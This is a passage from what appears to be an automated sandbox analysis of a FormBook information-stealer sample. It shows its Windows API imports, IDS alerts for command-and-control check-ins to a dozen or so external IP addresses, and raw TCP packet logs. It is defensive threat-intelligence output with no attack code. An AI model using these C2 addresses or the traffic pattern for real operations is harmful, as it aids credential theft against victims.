GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-09T16:47:27.947178+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049745194.9.94.8580TCP
                                                                          2025-01-09T16:47:43.571002+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049746198.58.118.16780TCP
                                                                          2025-01-09T16:47:46.253735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049747198.58.118.16780TCP
                                                                          2025-01-09T16:47:49.930634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049748198.58.118.16780TCP
                                                                          2025-01-09T16:47:52.606616+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049749198.58.118.16780TCP
                                                                          2025-01-09T16:47:58.492477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049750104.21.96.180TCP
                                                                          2025-01-09T16:48:01.112784+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049751104.21.96.180TCP
                                                                          2025-01-09T16:48:03.753364+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049752104.21.96.180TCP
                                                                          2025-01-09T16:48:06.419387+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049753104.21.96.180TCP
                                                                          2025-01-09T16:48:11.979736+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049754199.192.21.16980TCP
                                                                          2025-01-09T16:48:14.679447+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755199.192.21.16980TCP
                                                                          2025-01-09T16:48:17.382857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756199.192.21.16980TCP
                                                                          2025-01-09T16:48:20.081388+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049757199.192.21.16980TCP
                                                                          2025-01-09T16:48:35.800443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975847.83.1.9080TCP
                                                                          2025-01-09T16:48:38.696763+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975947.83.1.9080TCP
                                                                          2025-01-09T16:48:41.499193+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976047.83.1.9080TCP
                                                                          2025-01-09T16:48:44.345642+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976147.83.1.9080TCP
                                                                          2025-01-09T16:48:49.795815+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976276.223.54.14680TCP
                                                                          2025-01-09T16:48:52.454031+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976376.223.54.14680TCP
                                                                          2025-01-09T16:48:55.135738+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976476.223.54.14680TCP
                                                                          2025-01-09T16:48:57.804012+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976576.223.54.14680TCP
                                                                          2025-01-09T16:49:05.970373+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049766160.25.166.12380TCP
                                                                          2025-01-09T16:49:08.852586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049767160.25.166.12380TCP
                                                                          2025-01-09T16:49:11.747863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768160.25.166.12380TCP
                                                                          2025-01-09T16:49:14.627559+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049769160.25.166.12380TCP
                                                                          2025-01-09T16:49:20.046310+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049770104.21.13.14180TCP
                                                                          2025-01-09T16:49:22.706080+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049771104.21.13.14180TCP
                                                                          2025-01-09T16:49:25.350992+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772104.21.13.14180TCP
                                                                          2025-01-09T16:49:27.995965+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049773104.21.13.14180TCP
                                                                          2025-01-09T16:49:42.592031+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774136.243.64.14780TCP
                                                                          2025-01-09T16:49:45.344603+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049775136.243.64.14780TCP
                                                                          2025-01-09T16:49:48.123081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776136.243.64.14780TCP
                                                                          2025-01-09T16:49:50.871491+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049777136.243.64.14780TCP
                                                                          2025-01-09T16:49:56.894044+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049778202.95.11.11080TCP
                                                                          2025-01-09T16:49:59.710386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049779202.95.11.11080TCP
                                                                          2025-01-09T16:50:02.566506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780202.95.11.11080TCP
                                                                          2025-01-09T16:50:05.566422+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049781202.95.11.11080TCP
                                                                          2025-01-09T16:50:11.048802+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978276.223.54.14680TCP
                                                                          2025-01-09T16:50:14.734267+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978376.223.54.14680TCP
                                                                          2025-01-09T16:50:17.419595+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978476.223.54.14680TCP
                                                                          2025-01-09T16:50:20.090490+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978576.223.54.14680TCP
                                                                          2025-01-09T16:50:25.749494+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049786103.106.67.11280TCP
                                                                          2025-01-09T16:50:28.452346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049787103.106.67.11280TCP
                                                                          2025-01-09T16:50:31.151068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049788103.106.67.11280TCP
                                                                          2025-01-09T16:50:33.855509+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049789103.106.67.11280TCP
                                                                          2025-01-09T16:50:39.403064+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049790104.21.112.180TCP
                                                                          2025-01-09T16:50:42.056631+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049791104.21.112.180TCP
                                                                          2025-01-09T16:50:44.773237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792104.21.112.180TCP
                                                                          2025-01-09T16:50:47.745209+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049793104.21.112.180TCP
                                                                          2025-01-09T16:51:04.493043+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049794194.9.94.8580TCP
                                                                          2025-01-09T16:51:09.800196+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049795198.58.118.16780TCP
                                                                          2025-01-09T16:51:12.475652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796198.58.118.16780TCP
                                                                          2025-01-09T16:51:15.148193+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797198.58.118.16780TCP
                                                                          2025-01-09T16:51:17.815683+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049798198.58.118.16780TCP
                                                                          2025-01-09T16:51:23.504673+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049799104.21.96.180TCP
                                                                          2025-01-09T16:51:26.157606+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049800104.21.96.180TCP
                                                                          2025-01-09T16:51:28.855881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049801104.21.96.180TCP
                                                                          2025-01-09T16:51:31.459454+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049802104.21.96.180TCP
                                                                          2025-01-09T16:51:36.844192+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049803199.192.21.16980TCP
                                                                          2025-01-09T16:51:39.544390+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804199.192.21.16980TCP
                                                                          2025-01-09T16:51:42.254723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805199.192.21.16980TCP
                                                                          2025-01-09T16:51:44.941798+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049806199.192.21.16980TCP
                                                                          2025-01-09T16:51:59.430233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980747.83.1.9080TCP
                                                                          2025-01-09T16:52:02.291301+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980847.83.1.9080TCP
                                                                          2025-01-09T16:52:05.102104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980947.83.1.9080TCP
                                                                          2025-01-09T16:52:07.952797+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981047.83.1.9080TCP
                                                                          2025-01-09T16:52:14.256758+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981176.223.54.14680TCP
                                                                          2025-01-09T16:52:16.935495+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981276.223.54.14680TCP
                                                                          2025-01-09T16:52:20.616692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981376.223.54.14680TCP
                                                                          2025-01-09T16:52:24.321770+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981476.223.54.14680TCP
                                                                          2025-01-09T16:52:30.038048+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049815160.25.166.12380TCP
                                                                          2025-01-09T16:52:32.922872+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049816160.25.166.12380TCP
                                                                          2025-01-09T16:52:35.806472+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049817160.25.166.12380TCP
                                                                          2025-01-09T16:52:38.691764+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049818160.25.166.12380TCP
                                                                          2025-01-09T16:52:46.995877+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049819104.21.13.14180TCP
                                                                          2025-01-09T16:52:49.654907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049820104.21.13.14180TCP
                                                                          2025-01-09T16:52:52.329252+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049821104.21.13.14180TCP
                                                                          2025-01-09T16:52:54.955659+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049822104.21.13.14180TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 16:47:27.447846889 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:27.692989111 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.693335056 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:27.697716951 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:27.938944101 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.946897030 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.946958065 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.947000980 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.947042942 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.947077990 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.947110891 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:27.947177887 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:27.947487116 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:27.948995113 CET4974580192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:47:28.194060087 CET8049745194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:47:43.276828051 CET4974680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:43.419222116 CET8049746198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:43.419470072 CET4974680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:43.426031113 CET4974680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:43.570617914 CET8049746198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:43.570664883 CET8049746198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:43.571002007 CET4974680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:44.941580057 CET4974680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:45.958285093 CET4974780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:46.100745916 CET8049747198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:46.101068974 CET4974780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:46.107495070 CET4974780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:46.253424883 CET8049747198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:46.253473997 CET8049747198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:46.253735065 CET4974780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:47.612878084 CET4974780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:48.629467964 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.642414093 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.784409046 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:49.784555912 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.788150072 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.788182974 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.930330992 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:49.930634022 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:49.930732012 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:49.930742979 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:49.930962086 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:50.073246956 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:50.073293924 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:50.075325966 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:50.075371027 CET8049748198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:50.075572968 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:51.299565077 CET4974880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.316459894 CET4974980192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.458564043 CET8049749198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:52.458790064 CET4974980192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.461357117 CET4974980192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.606264114 CET8049749198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:52.606270075 CET8049749198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:52.606276035 CET8049749198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:52.606616020 CET4974980192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.607721090 CET4974980192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:47:52.749857903 CET8049749198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:47:57.792895079 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:47:57.911674023 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:57.911870956 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:47:57.918406963 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:47:58.037364960 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:58.492090940 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:58.492100954 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:58.492109060 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:58.492476940 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:47:58.492651939 CET8049750104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:47:58.492866993 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:47:59.422642946 CET4975080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:00.439389944 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:00.559168100 CET8049751104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:00.559489965 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:00.565758944 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:00.685592890 CET8049751104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:01.112435102 CET8049751104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:01.112481117 CET8049751104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:01.112783909 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:01.113161087 CET8049751104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:01.113325119 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:02.078694105 CET4975180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:03.095577002 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:03.215264082 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.215712070 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:03.222157001 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:03.341957092 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.342020988 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.342369080 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.342530966 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.342564106 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.753026009 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.753072023 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.753364086 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:03.753588915 CET8049752104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:03.753750086 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:04.734270096 CET4975280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:05.751141071 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:05.870520115 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:05.870980978 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:05.875560045 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:05.994585991 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:06.418689966 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:06.418703079 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:06.419387102 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:06.420710087 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:06.421339989 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:06.422178984 CET4975380192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:48:06.541006088 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:11.606528997 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.778832912 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.779076099 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.785504103 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.958297014 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979461908 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979487896 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979736090 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:13.294728994 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.311619997 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.484096050 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.484297991 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.490849018 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.663841963 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679184914 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679210901 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679446936 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:15.997554064 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.014287949 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.187020063 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.187381029 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.193728924 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.367017031 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367063046 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367093086 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367120028 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382185936 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382267952 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382857084 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:18.700189114 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:19.716839075 CET4975780192.168.11.20199.192.21.169
